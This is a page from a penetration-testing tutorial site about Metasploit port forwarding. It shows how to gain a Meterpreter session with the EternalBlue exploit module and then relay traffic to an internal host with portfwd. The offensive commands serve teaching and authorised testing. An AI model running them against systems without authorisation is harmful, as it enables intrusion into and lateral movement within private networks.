Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Port Fowarding

Metasploit: Port Forwarding

Port Forwarding with Metasploit

Port forwarding allows you to access a service that is normally inaccessible from your attacking machine by forwarding the traffic through a compromised system. This is typically used to access internal services behind firewalls or NAT devices.

In Metasploit, port forwarding can be set up using a Meterpreter session. The compromised system can act as a relay to forward traffic to other internal services.

Setting Up Port Forwarding in Metasploit

Step 1: Compromise the Target

Just like in the network pivoting scenario, you must first compromise the target system and obtain a Meterpreter session.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
run

Once the exploit succeeds, you will have a Meterpreter session:

meterpreter > sessions

Step 2: Set Up Port Forwarding

To forward ports through the compromised system, use the portfwd command in Meterpreter. For example, to forward local port 8080 on your attacking machine to port 80 on the internal network (192.168.1.100), use:

meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100

Here:

  • -l 8080 specifies the local port on your attacking machine.

  • -p 80 specifies the remote port on the internal network.

  • -r 192.168.1.100 specifies the internal target system.

Now, when you access http://localhost:8080 on your attacking machine, the traffic will be forwarded to the internal web service running on 192.168.1.100:80.

Step 3: Verify Port Forwarding

To verify that the port forwarding is working, try accessing the forwarded port in your browser or using tools like curl or wget.

curl http://localhost:8080

This should route your request through the compromised system to the internal service.

Step 4: Remove Port Forwarding

Once you’re done with the port forwarding, you can remove it using the following command:

meterpreter > portfwd delete -l 8080

This will stop forwarding traffic from localhost:8080.

PreviousSoCatNextAnti-Virus Evasion

Last updated 2 months ago